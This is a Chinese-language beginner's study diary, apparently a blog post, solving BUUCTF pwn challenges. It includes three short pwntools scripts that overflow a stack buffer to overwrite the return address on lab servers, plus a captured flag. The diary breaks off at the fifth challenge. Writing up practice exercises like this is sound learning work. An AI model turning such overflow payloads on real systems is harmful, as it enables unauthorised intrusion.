BUUCTF pwn學習日記

x1ao7a0發表於2024-10-29

我是純新手,零基礎的開始學Pwn嘍

時間:2024年10月29日

BUUCTF Pwn 學習日記

1.test_your_nc

下載附件,用IDA開啟


發現直接nc就可以獲得flag

cat flag得到flag{07c0b69c-dcbf-4991-8cc6-05660b1a2dd2}

2.rip

IDA開啟發現

沒有看見有用資訊,Shift+F12

發現了/bin/sh

初步懷疑是棧溢位,編寫指令碼

from pwn import *
p = remote("node5.buuoj.cn",27528)

payload = b'a' * (15+8) + p64(0x40118A)

p.sendline(payload)
p.interactive()     

3.warmup_csaw_2016


nc後發現給出的地址在cat附近


且有get那麼好像也是棧溢位呢


大小是0x40
所以套用上一個題的指令碼有

from pwn import *
p = remote("node5.buuoj.cn",26099)
payload = b'a' * (0x40+8) + p64(0x40060d)
p.sendline(payload)
p.interactive()     

4.ciscn_2019_n_1


發現是沒有保護的,直接進入IDA


有system!也有gets,嘗試棧溢位?

from pwn import *
p=remote("node5.buuoj.cn",28695)
#node5.buuoj.cn:28695
paypload=b'a'*(0x30+8)+p64(0x4006BE)
p.sendline(paypload)
p.interactive()

5.pwn1_sctf_2016


沒有任何保護
---------------------------------------------------------------------------------------------------------------2024年10月29日截至到22.16